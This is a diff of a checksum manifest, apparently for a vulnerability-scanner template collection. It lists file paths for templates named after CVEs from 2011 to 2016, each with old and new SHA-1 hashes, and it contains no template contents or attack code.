-http/cves/2012/CVE-2012-0394.yaml:bbb29dfcc41ef82283083e697babdb6536107f5d -http/cves/2012/CVE-2012-0896.yaml:0ee2e081e4361cdef73f087a245a604ba0442fe9 -http/cves/2012/CVE-2012-0901.yaml:c94354a586123e2eadbac6658ebecea66457cba5 -http/cves/2012/CVE-2012-0981.yaml:03525fb14bec7660c073c7ebb52ce28fb1d74748 -http/cves/2012/CVE-2012-0991.yaml:e4736a771137039d473e862c170650980876013e -http/cves/2012/CVE-2012-0996.yaml:c29e50b5a8f4e58519fda8029285586989b83de2 -http/cves/2012/CVE-2012-1226.yaml:ecda9505aa702ebfdf02e098ebd4c144a4b85606 -http/cves/2012/CVE-2012-1823.yaml:707c0b64671ffd0e35345015a28c546b5561249e -http/cves/2012/CVE-2012-1835.yaml:71ea2751a8a85e520f9897f9e67118294a30704e -http/cves/2012/CVE-2012-2371.yaml:ea4182fc53597edf03eb86bcd49f315eb692c6c6 -http/cves/2012/CVE-2012-3153.yaml:5de084bec3ffb36ec20b76fa658acbf8dbe42c9d -http/cves/2012/CVE-2012-4032.yaml:67ece4954d9197f505da8d100478c41d55ccdfa0 -http/cves/2012/CVE-2012-4242.yaml:4c8ec7f47462d3d3052026e7fb8835e84a3c4e2f -http/cves/2012/CVE-2012-4253.yaml:0a06775d359ea9ea6c37c7acc7cf3a0500f6eec8 -http/cves/2012/CVE-2012-4273.yaml:38a6ecc521a6e97f7194a74bb473e066a23cc3f5 -http/cves/2012/CVE-2012-4547.yaml:fd2b8c0c5e5a53be99495fe21132c8ad27a81dfc -http/cves/2012/CVE-2012-4768.yaml:d9aae9674149f09de49e847a23433e6b82caa5a9 -http/cves/2012/CVE-2012-4878.yaml:45cdd4288217fd8569b0318e46ecedd83cd319d3 -http/cves/2012/CVE-2012-4889.yaml:a7afbb3c5a74cb9e6adf3f9a7776dc9bdef83a61 -http/cves/2012/CVE-2012-4940.yaml:0650624142d894496a406438a29d2af3a8459386 -http/cves/2012/CVE-2012-4982.yaml:45bd34a9d93b9bcb8c5516ce5d0fed623d7a20f2 -http/cves/2012/CVE-2012-5321.yaml:88a9bff05fe32780a4dfdeaa2dd33d18c6b2003f -http/cves/2012/CVE-2012-5913.yaml:ef3fd2d088c9243c72b5e3cf3ef503406a120e11 -http/cves/2012/CVE-2012-6499.yaml:96760ec5a592c4346acc74ee4f32c9af58b541cf -http/cves/2013/CVE-2013-1965.yaml:c5c804a542d0cf150f2d827362ae44239e17061d +http/cves/2011/CVE-2011-4336.yaml:e5b1a1c88b1ab0f7479fb9d54fc73eacffebcea0 +http/cves/2011/CVE-2011-4618.yaml:4eab7f14122db00578abe4f0dfc38b5cc529d601 +http/cves/2011/CVE-2011-4624.yaml:bc056bdda6bdd6003cd653eae903719d1b779937 +http/cves/2011/CVE-2011-4804.yaml:c505186a83e3d76be053fc6aa52a5c343476f817 +http/cves/2011/CVE-2011-4926.yaml:ab345771b1641bf7f2a1100f291f1c7d0aacaccc +http/cves/2011/CVE-2011-5106.yaml:8bae1ad4db704887588bb0aecc274dd3c4d4a34e +http/cves/2011/CVE-2011-5107.yaml:7aa395c538c9ab49391e13e1968ae25aa089b03d +http/cves/2011/CVE-2011-5179.yaml:b019db073432dbaf044c97c123a4dc57c81d4092 +http/cves/2011/CVE-2011-5181.yaml:939ccb75af19e0374b6f44781bd854d5c8d7d137 +http/cves/2011/CVE-2011-5252.yaml:e970b05018c106c69c27e438ae4bc6e2cd78014e +http/cves/2011/CVE-2011-5265.yaml:6129c32187cd69288c111f54bf54131143f600ae +http/cves/2012/CVE-2012-0392.yaml:ef2699d50712b35d149356a4989f8359ab1c0a02 +http/cves/2012/CVE-2012-0394.yaml:1ed1ed1046ec9bdfb38b162a84bee661eb6d3ed5 +http/cves/2012/CVE-2012-0896.yaml:7934f9e9af066d82655d55b942343befee18ff11 +http/cves/2012/CVE-2012-0901.yaml:96e44bc5855fb058fa85871da06c9e2c061bb393 +http/cves/2012/CVE-2012-0981.yaml:222fe829837146e40370f981ab1d2c35b95ede9d +http/cves/2012/CVE-2012-0991.yaml:623ee7fc2ec66f81f45afd988329141c8bb6cf73 +http/cves/2012/CVE-2012-0996.yaml:2fbd73bb7913df7b608c3d248d82ef3cdf7052ba +http/cves/2012/CVE-2012-1226.yaml:18bb051a359e2fa3416e0ae1113034daf220c411 +http/cves/2012/CVE-2012-1823.yaml:5a156fc4c1d7c1a5b04addd50037bb3c2d5f34af +http/cves/2012/CVE-2012-1835.yaml:c986b0de9a5fa2b4e53b4668e39f8e50b809db69 +http/cves/2012/CVE-2012-2371.yaml:6fc6f7316b869a10bb5d8d28b9cf073f060d0e45 +http/cves/2012/CVE-2012-3153.yaml:58ac08d7dbb89463979074e3013b4388d8bbe644 +http/cves/2012/CVE-2012-4032.yaml:8bbd7ef8dd00784209b94c1aff928de690040794 +http/cves/2012/CVE-2012-4242.yaml:fc5f4a915dbf7dfb81c919ed7f739e6f23df07df +http/cves/2012/CVE-2012-4253.yaml:8f873f63383267c59e92ba409ae923ee3ccfcc00 +http/cves/2012/CVE-2012-4273.yaml:8345525721ed9072c95b88e6fcfb4f78f69db008 +http/cves/2012/CVE-2012-4547.yaml:149f4d347b88e296e26c58c31bb87622d08ed940 +http/cves/2012/CVE-2012-4768.yaml:68a82851ec95aec6e81cda3fb3a422c026a85331 +http/cves/2012/CVE-2012-4878.yaml:aaa19f5f70d33e7cfa275289252d6f8a18c8c91e +http/cves/2012/CVE-2012-4889.yaml:54a94eb9a02a6be30f2dcbad0bdff2106d5a92fa +http/cves/2012/CVE-2012-4940.yaml:404cd10278593d39f5a0e8d937eb99b5a999f0a7 +http/cves/2012/CVE-2012-4982.yaml:bcbfa536907bac8805b2fbf93f3a76517a535f6c +http/cves/2012/CVE-2012-5321.yaml:5ae31309bbdb6a27f76b587e13d27d2d391c8aeb +http/cves/2012/CVE-2012-5913.yaml:dbd16866f4a06a86449c33164e1897a1b5bb9b66 +http/cves/2012/CVE-2012-6499.yaml:c529032f64f223e1accb8d12553cd8064b38c426 +http/cves/2013/CVE-2013-1965.yaml:506043914100d02bee29d915dd16013f705014db http/cves/2013/CVE-2013-2248.yaml:52af21a8be9a59720dd23a52240bf7e8c72ae76f http/cves/2013/CVE-2013-2251.yaml:1230397278455e120e1e6d6529356aa3f65cd61f -http/cves/2013/CVE-2013-2287.yaml:6411888bd5df99c48ba9e51a406190fe342f6d35 -http/cves/2013/CVE-2013-2621.yaml:b1eb05c7e896b0faa0d2fb2a30ae69516ffed62d -http/cves/2013/CVE-2013-3526.yaml:ba88426323e0ddf0737a07a504b68da02d926f1f -http/cves/2013/CVE-2013-3827.yaml:c18ac21dfd28fd3fbd9b90348142a8e950848dc9 -http/cves/2013/CVE-2013-4117.yaml:23cf560bf4574381225532667846fd209d0b71f9 -http/cves/2013/CVE-2013-4625.yaml:63387fb43989deeff0f90c977ec0112d3939704f -http/cves/2013/CVE-2013-5528.yaml:0166634951c8e1aa742b5fce17aa78f826430e5d -http/cves/2013/CVE-2013-5979.yaml:776c661ff024d5485e867238d07e194c7154be4d -http/cves/2013/CVE-2013-6281.yaml:40ef83fa07d967308a69daf2a5905ac3ad135799 +http/cves/2013/CVE-2013-2287.yaml:099fa13d680b620e318b98295ba38ecfb622c9dd +http/cves/2013/CVE-2013-2621.yaml:38c09b987550c8e937178873c67dc376aba26a14 +http/cves/2013/CVE-2013-3526.yaml:21b1b5a0544886dc2b4021b6b5ee24a66d295440 +http/cves/2013/CVE-2013-3827.yaml:23ed9922aa69addbebd26ceed6b0120a0d0e5baa +http/cves/2013/CVE-2013-4117.yaml:d9b2db76302f1e99e78e31b23d058da77d35f60e +http/cves/2013/CVE-2013-4625.yaml:83fc30c822c42974254a393abdaa0145b2729c8b +http/cves/2013/CVE-2013-5528.yaml:7cdce80acbe6b5b3ddaffb10704432431094b3ab +http/cves/2013/CVE-2013-5979.yaml:c16407d878d5f03db1d768c36ff3132d1a23335a +http/cves/2013/CVE-2013-6281.yaml:5305cbdf8d33c782431c54f34161ee862cfde6b6 http/cves/2013/CVE-2013-7091.yaml:787ebc4d72bbed03124fc1667508cf58a9d6a5ab -http/cves/2013/CVE-2013-7240.yaml:81ef2e0f547c202a2c67c19cafbcc48e4ce58bef -http/cves/2013/CVE-2013-7285.yaml:b9a38581f95d91ffb3919acbe21109dd5246ef3b -http/cves/2014/CVE-2014-10037.yaml:870d6eec8d024fb7143d69a360d579b78d3a2103 -http/cves/2014/CVE-2014-1203.yaml:823c336191844f20566697875a1e64e6fcbbc66a -http/cves/2014/CVE-2014-2321.yaml:70ea337d41737fccf16072c8c7ca265eaf63fcd0 +http/cves/2013/CVE-2013-7240.yaml:0f3902632d07629bd4271cef807f0da87ee4ba6f +http/cves/2013/CVE-2013-7285.yaml:a352c7a787d3aae7cfd49e1e8a846e8bf5e1ee9f +http/cves/2014/CVE-2014-10037.yaml:f5b56884bc2304a6bf07018e1ae0bd47f1266360 +http/cves/2014/CVE-2014-1203.yaml:44d6847debcead0628f111fff322f805087b5752 +http/cves/2014/CVE-2014-2321.yaml:747204394c44a15e7289f350ece4fd366f9665ea http/cves/2014/CVE-2014-2323.yaml:7ce4f365127b2d56d93bd00621fe7f66cb75d920 -http/cves/2014/CVE-2014-2383.yaml:e6fc065c26077bbaa1da092742dcbfc2433cbb17 -http/cves/2014/CVE-2014-2908.yaml:23bd4300dbcf41a52e228bd76670fd0072f29589 -http/cves/2014/CVE-2014-2962.yaml:f0b19e507060a28dfecaa057a044859b51c55165 -http/cves/2014/CVE-2014-3120.yaml:ffac0398c9bd438dd40a5267cce63f56dbb47dd8 -http/cves/2014/CVE-2014-3206.yaml:c256e8fc819159303014d0e32e244bfe0ba19368 +http/cves/2014/CVE-2014-2383.yaml:4240bcc6f08619bbda26fbe8c8730ff9537320d1 +http/cves/2014/CVE-2014-2908.yaml:51e95a406ebd6deb9df828f28ecfce0b9406ec1d +http/cves/2014/CVE-2014-2962.yaml:d9c4a86c1ff32409775564ea00be69d99592cbe5 +http/cves/2014/CVE-2014-3120.yaml:3728a21d0acd33c8115f2f2f0f9a5e5a59baebfc +http/cves/2014/CVE-2014-3206.yaml:a7d80c3aeda256396840c73ebf994859089ef7ee http/cves/2014/CVE-2014-3704.yaml:d71b56809f076a074a9b5cb0499714902d43dd48 -http/cves/2014/CVE-2014-3744.yaml:9294a192b6be8fb7761d8f08d607eac3c6776286 -http/cves/2014/CVE-2014-4210.yaml:eae329e157e1cb46e088c8c93f8048907f8a9dbc -http/cves/2014/CVE-2014-4513.yaml:9420a793b0da39d6b2f3632e0d974e74cb9d02a9 -http/cves/2014/CVE-2014-4535.yaml:ed185b6b4cecc89ddb24270d8887f4dd7ad14628 -http/cves/2014/CVE-2014-4536.yaml:c16ef0a77cf9d9f43ec3c06024cf2bb5e3461d14 -http/cves/2014/CVE-2014-4539.yaml:68ab098aeb40650efee9954fe265de0bafbea554 -http/cves/2014/CVE-2014-4544.yaml:c5552a3ac7cbd1856b4c2888daab83a04be311e8 -http/cves/2014/CVE-2014-4550.yaml:0fff504a61e85614493172afacb34ee6a8270b5e -http/cves/2014/CVE-2014-4558.yaml:eececb2a9c57b203236250c9d92a2f31ed72ef1c -http/cves/2014/CVE-2014-4561.yaml:b6b791e12ccc5c6f6cba8b504b20adf0a4b5f689 -http/cves/2014/CVE-2014-4592.yaml:f42c67af879558613a93676a9284c3b5c29361b3 -http/cves/2014/CVE-2014-4940.yaml:036ab9b80130d8e0a94617b05e626593d4536648 -http/cves/2014/CVE-2014-4942.yaml:4939facee67d4b71a3ab32ebc9d5ecd517001a44 -http/cves/2014/CVE-2014-5111.yaml:680083f6588d8fd90442b70b20d215416058a9c9 -http/cves/2014/CVE-2014-5258.yaml:c9b9901d9ce95b493e6040e85c6cbc56e8f2b5fb -http/cves/2014/CVE-2014-5368.yaml:ff9215b872aa23b150f7e96dba45d0c5d5f5579c +http/cves/2014/CVE-2014-3744.yaml:f48003f432ebf521ed77ebe5297f5c4becc8b46e +http/cves/2014/CVE-2014-4210.yaml:825c4cefd8d7c0ddbf6ad39aecd22ba78840bd27 +http/cves/2014/CVE-2014-4513.yaml:41cd4b65ac5905ee8895e34436d91fa172f9044d +http/cves/2014/CVE-2014-4535.yaml:c02bd8a130ed394e2ef62cf0970cc5c656884e5c +http/cves/2014/CVE-2014-4536.yaml:d81be6c880a747c549a5ed28279c2afcd19cbb46 +http/cves/2014/CVE-2014-4539.yaml:21ca174eecb098fd2518b515e952a7695972cee8 +http/cves/2014/CVE-2014-4544.yaml:2262f2b9c62a635c34750680867e185c83df26a2 +http/cves/2014/CVE-2014-4550.yaml:8bbc30f6d24acda0dd3e8e294d301600c62cac3d +http/cves/2014/CVE-2014-4558.yaml:30d59c88bce6fd9d8d7157b079ca5f9195f63685 +http/cves/2014/CVE-2014-4561.yaml:dc7db23f5acf5e1a1d4d4c485ad4f004776df44e +http/cves/2014/CVE-2014-4592.yaml:0b86a0133670d6f2e3b202997bcc1848deced9cc +http/cves/2014/CVE-2014-4940.yaml:86f555b71ede9181667902b3ece8f3aca56b110d +http/cves/2014/CVE-2014-4942.yaml:c5ea785bab7ba2809eff218c01a331f0dc5fea32 +http/cves/2014/CVE-2014-5111.yaml:14c65fe597837c79e98ad52a7e7eeac838b871ac +http/cves/2014/CVE-2014-5258.yaml:57722d7446cd5d4e9436ded0650f8bedb96c0095 +http/cves/2014/CVE-2014-5368.yaml:d1f81a4deffabe13f22d53c5372be2a000fa94fd http/cves/2014/CVE-2014-6271.yaml:1e66aea403b8845fc9a535c27a7a1d9f13fd3e75 http/cves/2014/CVE-2014-6287.yaml:77f152601c5b8b99baba6f5d70ffb407424e1fcc -http/cves/2014/CVE-2014-6308.yaml:ee16ae1a687cbb904b5eec980f44967ec36f2686 -http/cves/2014/CVE-2014-8676.yaml:f96e243256180db9daedaddc2258914c0f6dc90e -http/cves/2014/CVE-2014-8682.yaml:be5740a53e079e1fabbd2af7cc0929994e82f5e8 -http/cves/2014/CVE-2014-8799.yaml:2068b3facd7987706416a949002cdeab69d7ff0b -http/cves/2014/CVE-2014-9094.yaml:db60f6c800ff6ccbb97491f54d58d278f6e14e95 -http/cves/2014/CVE-2014-9119.yaml:04016b43bae0f87fea29bebe86cfdbdd3ef4cd74 -http/cves/2014/CVE-2014-9180.yaml:e0508e1f256b4550b94009ec754733468e98a7d7 -http/cves/2014/CVE-2014-9444.yaml:8d4a11cd4e1df4e2a47ef519ad7271da0806168a -http/cves/2014/CVE-2014-9606.yaml:73202110c0cf9e6f5cb6d91f29a8b184d83874e5 -http/cves/2014/CVE-2014-9607.yaml:a3facb5b783cf410e200ef36ca128817c53f8315 -http/cves/2014/CVE-2014-9608.yaml:8024eed69643b142c94966b42be8989884c86a80 -http/cves/2014/CVE-2014-9609.yaml:19b7542f09671d514f9b3ebc9f565fbc4f3aa9ad -http/cves/2014/CVE-2014-9614.yaml:d7cbfd112d26149574fc5ba69368436f731f8b30 -http/cves/2014/CVE-2014-9615.yaml:f6e31d8bd6454c0b94c48cbfdf9770cb62529c1e -http/cves/2014/CVE-2014-9617.yaml:c3e54564674ada7e8d7db6ec0e27ee17c7c206ff -http/cves/2014/CVE-2014-9618.yaml:3fab9e27c58226ba19cc2b1ae91ce071026d4ae5 -http/cves/2015/CVE-2015-0554.yaml:064fc452bca322086aff5ed45a1912cdcb6bb0dc -http/cves/2015/CVE-2015-1000005.yaml:4b9140b90bca1484dfdfbece7e6df51c81e1ac47 -http/cves/2015/CVE-2015-1000010.yaml:9a5fcdc15cb3aeefcdaf499419bf0c7eaaca2f7e -http/cves/2015/CVE-2015-1000012.yaml:94594847f675f50d96d7855f461c0a2fc26386d7 -http/cves/2015/CVE-2015-1427.yaml:d857a633558aadde444880b8324f4be543bbab20 -http/cves/2015/CVE-2015-1503.yaml:eaf3c9b9435ad4c365f98773c6f2a06bb3112e85 -http/cves/2015/CVE-2015-1579.yaml:7651b35a5b8e167acb750082f1207aae3c77b04a -http/cves/2015/CVE-2015-1880.yaml:b80a16ed6a9dbc88985822ff8a50d6caaa947f08 +http/cves/2014/CVE-2014-6308.yaml:686cc1cc55eef122b9b1a1f64c7b85ecb61e3dfa +http/cves/2014/CVE-2014-8676.yaml:8b1d791264c8a15196e8070d203d229fce6c41c2 +http/cves/2014/CVE-2014-8682.yaml:018572b954c01d70fa76265913ee80d850eb3b2d +http/cves/2014/CVE-2014-8799.yaml:8dd79a3c11c9736872b667a3332b06e4e54f6cd5 +http/cves/2014/CVE-2014-9094.yaml:731091f3eb9ea34e433a5d6a18da52e9b01da9fb +http/cves/2014/CVE-2014-9119.yaml:ee97359a854e89ce331bac50efc2549aaf36c90c +http/cves/2014/CVE-2014-9180.yaml:8d0cac6c44a9a018d177a1b76636b289418cb3aa +http/cves/2014/CVE-2014-9444.yaml:5a714c90b7ddfb46f9173f033307cf3b00403c4b +http/cves/2014/CVE-2014-9606.yaml:4473eb1e03f334d09d26afb1912250d3c8f9d00f +http/cves/2014/CVE-2014-9607.yaml:974b4affd3dfb15c5c7fa181c74d7f27e87fd6a3 +http/cves/2014/CVE-2014-9608.yaml:0986f4c9de6d7977a4cc47fec2bce3c1e9b4632f +http/cves/2014/CVE-2014-9609.yaml:9844cc0040a865cf97de2ca4b72dd9ae98ac6174 +http/cves/2014/CVE-2014-9614.yaml:d04ff71ca65a2969d242b15ef30b52e1b97e6a5f +http/cves/2014/CVE-2014-9615.yaml:7b685033411ca2ed0f47857160f413d38c15b465 +http/cves/2014/CVE-2014-9617.yaml:2ea3c9b9b856effa55c0b45ab0686be4726bccff +http/cves/2014/CVE-2014-9618.yaml:6dc06aa5db439a55137ab446f43d897070b976a1 +http/cves/2015/CVE-2015-0554.yaml:0f15169dd1c2dd76233edeb7a0d5034e6778c9eb +http/cves/2015/CVE-2015-1000005.yaml:095ffeb066b89f14b74fb5478db7bd0b12697323 +http/cves/2015/CVE-2015-1000010.yaml:6bef659e35609c811ba2bce7ede40a16854f7258 +http/cves/2015/CVE-2015-1000012.yaml:38e9b4a24da3b12cc9bd14b60abf0a7c7c08e7f2 +http/cves/2015/CVE-2015-1427.yaml:c1f289b827dc1b5fd8ad3c40a67c7d59b47dfeca +http/cves/2015/CVE-2015-1503.yaml:59f827f259a8b0809034441ed74e0f80376beb02 +http/cves/2015/CVE-2015-1579.yaml:150ec3a61b31c9c1a8c4fe516e68f6df1cbbcbff +http/cves/2015/CVE-2015-1880.yaml:58d07e14a72f1f3d39ab35974d41e80054154dc5 http/cves/2015/CVE-2015-20067.yaml:785c1c2db6a4483739645939a7ba573a05503406 -http/cves/2015/CVE-2015-2067.yaml:79606d10c30ca5f00af1def780359abc8368d79e -http/cves/2015/CVE-2015-2068.yaml:f6153efb18f72b59deb74d55f3faba4e3bdd06f7 -http/cves/2015/CVE-2015-2080.yaml:75bbab2d13a2ba2aa45244165507742795998a3e -http/cves/2015/CVE-2015-2166.yaml:c67a1ae54c56a37138204604cddde7c022545318 -http/cves/2015/CVE-2015-2196.yaml:8be6b88a2adf6578d90bc1b244f133741913e088 -http/cves/2015/CVE-2015-2755.yaml:8a7129a03c0465d5d4d6db0f2b4de9fbcbaeb229 -http/cves/2015/CVE-2015-2807.yaml:a27ce790a54410b58bca2d107f4770d71c4335c9 -http/cves/2015/CVE-2015-2863.yaml:8ea8bfb3e60636ad8a0c831529b8db7bb248e1bf -http/cves/2015/CVE-2015-2996.yaml:b5a497197adcfc26430a0013932575c98bde741f -http/cves/2015/CVE-2015-3035.yaml:33b6b6830ee48590312cf997b1566849fb820d94 -http/cves/2015/CVE-2015-3224.yaml:6c504b7e2f180c261dbd66fb36c6834bf5ee83e4 -http/cves/2015/CVE-2015-3337.yaml:c52173ddb2ada82645952cac118ee2c745fc1e7b -http/cves/2015/CVE-2015-3648.yaml:a12670f01ebd18745b055b57a72860850fb497c9 -http/cves/2015/CVE-2015-3897.yaml:29f841f348bb2ee965ecf4bcf0cfa338fa025113 -http/cves/2015/CVE-2015-4050.yaml:1d328dd052a6ffd8439c2a12cf0cdac0877f7a67 -http/cves/2015/CVE-2015-4062.yaml:2d6677a353892252edc97535a0fe8f4584489e21 -http/cves/2015/CVE-2015-4063.yaml:1d3afdf64a24d4f7dbe2c8f78caeb5815eddfc62 -http/cves/2015/CVE-2015-4074.yaml:186e6adb639de8786c1e7f804a30565188b61650 -http/cves/2015/CVE-2015-4127.yaml:3014ef5a18b6a4284f6ebada680e860d4cd2be68 -http/cves/2015/CVE-2015-4414.yaml:4404e4bb147a0a94b5f5ec608eb6cb2d8a0741a0 -http/cves/2015/CVE-2015-4632.yaml:b94785422d9ec72c406cda604cac418467c16694 -http/cves/2015/CVE-2015-4666.yaml:8f1467571f8b5549977e1b50fcf8c67778ef4780 -http/cves/2015/CVE-2015-4668.yaml:dfd2cf69a4caa9a539b64cdadb124649a9124408 -http/cves/2015/CVE-2015-4694.yaml:6e519efee691097a489d5832398ee04af5e16771 -http/cves/2015/CVE-2015-5354.yaml:bb7d06578036a09e7353681bc86a37ef32eaf2ff -http/cves/2015/CVE-2015-5461.yaml:b9c1b5405b76204b5c2fd555e2b82da9fec8bcf8 -http/cves/2015/CVE-2015-5469.yaml:185190b779e332274b9870b5acccaf0f95a22d35 -http/cves/2015/CVE-2015-5471.yaml:9b4f375e831b43211a9a7f851f089d771da08ec2 -http/cves/2015/CVE-2015-5531.yaml:b4ae034f1b9bde1a4e68a4ae58daf88be99371c7 -http/cves/2015/CVE-2015-5688.yaml:847ea07613f104f2119941429fb2073f3987c086 -http/cves/2015/CVE-2015-6477.yaml:a347cb60fbce9d46465f6fdbb124c4e21cbe3706 -http/cves/2015/CVE-2015-6544.yaml:c43a67d85a5debaabe3dec744244adf0456faedf -http/cves/2015/CVE-2015-6920.yaml:4357cb17793b3b7d57dfe85edcbfb57fad5478ce -http/cves/2015/CVE-2015-7245.yaml:89bea5f3d1e7fce74a215f81a439ecf2f3ccd0bf +http/cves/2015/CVE-2015-2067.yaml:6bc639b419fa89404df6d544acbb8df3cd422303 +http/cves/2015/CVE-2015-2068.yaml:f131e828a236e68f15e90298834dfabba16aedaf +http/cves/2015/CVE-2015-2080.yaml:d426e77f9a32bcc9d0e58fbac5651c2e6c6c184c +http/cves/2015/CVE-2015-2166.yaml:06b913315a7b8e94805a38651615ca2f513b882c +http/cves/2015/CVE-2015-2196.yaml:670b2c5ef1610f3dea14055e0d68e4b0b3e638b1 +http/cves/2015/CVE-2015-2755.yaml:67511923f7c2c5e061302d230bb55215c4609d43 +http/cves/2015/CVE-2015-2807.yaml:aabb8eaaceb70fb3a6e20da4fdf8dc3ea3bb5a3e +http/cves/2015/CVE-2015-2863.yaml:adfab6e15178bd83dac9429bb55a78854f1997c4 +http/cves/2015/CVE-2015-2996.yaml:dc1143f47afd89b7d9325db7d8c124b21bf53d7a +http/cves/2015/CVE-2015-3035.yaml:c82f96367e60de70140f1cb3a4f926aea9c791d5 +http/cves/2015/CVE-2015-3224.yaml:7c881e724ef701920992ad5106441437bbc5955b +http/cves/2015/CVE-2015-3337.yaml:3f4ff6af65a4fcff09e39914adcad67126acdf9a +http/cves/2015/CVE-2015-3648.yaml:e37cf51d4af3f27f40f1b727a68b0ac684156d0f +http/cves/2015/CVE-2015-3897.yaml:b6a46adad1ec899b3d87bf0b885baba4a206d9d1 +http/cves/2015/CVE-2015-4050.yaml:53bcc623e37a90a2c253ac3d588f5bcbd870b3e6 +http/cves/2015/CVE-2015-4062.yaml:e5f7f477aba4bacaa994576914c516b4cc38b865 +http/cves/2015/CVE-2015-4063.yaml:d5564f399a2844f2e035c489a28969c0a88b1c99 +http/cves/2015/CVE-2015-4074.yaml:a8ec5e9f954929cb2f11e4dda7feb015eb45d329 +http/cves/2015/CVE-2015-4127.yaml:aa6b968328224f21c23704b688bb85d969c58711 +http/cves/2015/CVE-2015-4414.yaml:77637bf67200ba19e8da0a60a147ba57870a0dc6 +http/cves/2015/CVE-2015-4632.yaml:6beb9c6f3ea985c1145f4c02136f379927da3193 +http/cves/2015/CVE-2015-4666.yaml:6e61bc9a621ce17cff716b5f790c83bdea4fb98e +http/cves/2015/CVE-2015-4668.yaml:bcb15e88745383f4f562f6bdd4e42286ba81131e +http/cves/2015/CVE-2015-4694.yaml:2fdc68dd348d22ce7bf1f484fa51e7deefee3435 +http/cves/2015/CVE-2015-5354.yaml:e9d870512a6dd4e9f6bf82eeba1e763732a969d3 +http/cves/2015/CVE-2015-5461.yaml:1184bcb5e170ff448ae24012ef5612dcb0286077 +http/cves/2015/CVE-2015-5469.yaml:5df163df1f9bcb3230cf467e51f6d0ad6c1e335f +http/cves/2015/CVE-2015-5471.yaml:99927bd5d5243d074eb76cb5254ee7607ce2b78b +http/cves/2015/CVE-2015-5531.yaml:f5f254ee28a12caa11350d47f980b0c8eba498a7 +http/cves/2015/CVE-2015-5688.yaml:0b04a9c75086020fc18bdb40386b5f8a7722125b +http/cves/2015/CVE-2015-6477.yaml:dc856938f1d4f8601215edaed7fbc2458fbcc5cc +http/cves/2015/CVE-2015-6544.yaml:3a5200a310b97d930fce4438f5f57dcbdb57db8c +http/cves/2015/CVE-2015-6920.yaml:a56eaf559855747d72595482ec468b7f024728df +http/cves/2015/CVE-2015-7245.yaml:61897bc315c044b5c3ed0eb8d8eb6be35a02ecb4 http/cves/2015/CVE-2015-7297.yaml:ee6ffdbb3ecf6708fdf76decf78db3961954b8b8 -http/cves/2015/CVE-2015-7377.yaml:bd6e1fea99c511fd2615d862a28a7c7ed9d95324 -http/cves/2015/CVE-2015-7450.yaml:905b9cdc3f19b9d7869778d1c2b23b2b8bdf8826 -http/cves/2015/CVE-2015-7780.yaml:2433a3a04dd58bf2c7a3243ce923edaa09c208c1 -http/cves/2015/CVE-2015-7823.yaml:8891123d768817ce22b517cfbf6d6d699c3e8450 -http/cves/2015/CVE-2015-8349.yaml:8416cf6432492314afbcc5912016a8f710a8eb8c +http/cves/2015/CVE-2015-7377.yaml:2f2dfc657ff492e55fa7f730cfaef88d7fe54793 +http/cves/2015/CVE-2015-7450.yaml:489cc0a54bccdcd703b819b1e6d2add0afe15b80 +http/cves/2015/CVE-2015-7780.yaml:cdfc74c6585a3545a3816454f9f38b893190dcd8 +http/cves/2015/CVE-2015-7823.yaml:3ae2fe554c626517657db7d129e4516c2d3c29e6 +http/cves/2015/CVE-2015-8349.yaml:9ddbb82df7e1a02567263648393933c6781d9c97 http/cves/2015/CVE-2015-8399.yaml:0896a7dc49acb135939c804a7f45c05a62bb6ce5 -http/cves/2015/CVE-2015-8813.yaml:bb2fe75af8a97b081fb3312036ffb81fbf2e25ea -http/cves/2015/CVE-2015-9312.yaml:775d33238623e1438f44f1eb0a565255f0b773f4 -http/cves/2015/CVE-2015-9323.yaml:224063ab5f46d0840d193360955a64b88ad5a739 -http/cves/2015/CVE-2015-9414.yaml:b754562edf298148491a77b11d92e6845d6d6ef3 -http/cves/2015/CVE-2015-9480.yaml:4ab1e42e8af68c0f579a7a84cf058a9759c8a7be -http/cves/2016/CVE-2016-0957.yaml:c752126907225333a4f314b93ed65a0ced09eb9e -http/cves/2016/CVE-2016-1000126.yaml:898322b70d44588b112833e15188e631b96fe9bd -http/cves/2016/CVE-2016-1000127.yaml:91f611e929ea50a579817f03f7d839208ba1345e -http/cves/2016/CVE-2016-1000128.yaml:4b257a3e8cc3f781f97268f6ab2eda1da0f69efa -http/cves/2016/CVE-2016-1000129.yaml:3e648b0c51d4f3a2daf8b8d6ecea93fbc2782ef9 -http/cves/2016/CVE-2016-1000130.yaml:dc5397c6eb5df23bc82b12289bba119d8fe9c825 -http/cves/2016/CVE-2016-1000131.yaml:a14fba69ffc9ad3a6158859ad898d5dfc0d0c1b9 -http/cves/2016/CVE-2016-1000132.yaml:68688b6915abe602cb2fff3d4446d00917836006 -http/cves/2016/CVE-2016-1000133.yaml:1e2b29c7463f9977c46cd0c03e6f7ff4f4947f04 -http/cves/2016/CVE-2016-1000134.yaml:50a9783e9ff32e66e346c67c4c99869d886d6ea5 -http/cves/2016/CVE-2016-1000135.yaml:a561993b9e7c546e1553a0536b778183e35c8da1 -http/cves/2016/CVE-2016-1000136.yaml:46e89bbaadb0b36f56824d3666d8c6f15554afe3 -http/cves/2016/CVE-2016-1000137.yaml:b2e0149b838f8662690666e95241410f85fc5197 -http/cves/2016/CVE-2016-1000138.yaml:3a9dffbf84584b1aa351843ffec83a900a0f1136 -http/cves/2016/CVE-2016-1000139.yaml:49c62a8871b6f19e8d23506f4e07a2b880d9d358 -http/cves/2016/CVE-2016-1000140.yaml:04feb3f8fc30355e6a32ddf909d926bdc7ea6f66 -http/cves/2016/CVE-2016-1000141.yaml:387b4289a0ea2a834fa80f625782ecbc53c32bb4 -http/cves/2016/CVE-2016-1000142.yaml:2ae84ad2782cce24c5518fbcae51a008db4f79a0 -http/cves/2016/CVE-2016-1000143.yaml:b175acde5d322daedfd4cd0c995463014fb299b2 -http/cves/2016/CVE-2016-1000146.yaml:887f3dd8756ec4ad63c875829bea55696bef8c4c -http/cves/2016/CVE-2016-1000148.yaml:938221b2f8bf3bf4e567861c0ad7b104ac1dc19b -http/cves/2016/CVE-2016-1000149.yaml:36923ce403c73d5387f0f9dc8ada48fee7c883bc -http/cves/2016/CVE-2016-1000152.yaml:69d66d82ac430a1d9cd041add8e182625f674369 -http/cves/2016/CVE-2016-1000153.yaml:3e1f37fb0dc56e4a1cc85504a9ce4b2e9c3b78de -http/cves/2016/CVE-2016-1000154.yaml:2eede86a4c21949ae4408427faaa28ea551cfbca -http/cves/2016/CVE-2016-1000155.yaml:bca122ca83f6eceb96338b8daad22872e98399da -http/cves/2016/CVE-2016-10033.yaml:1629f6583c60abfb03793a24c9c16a436027ceb0 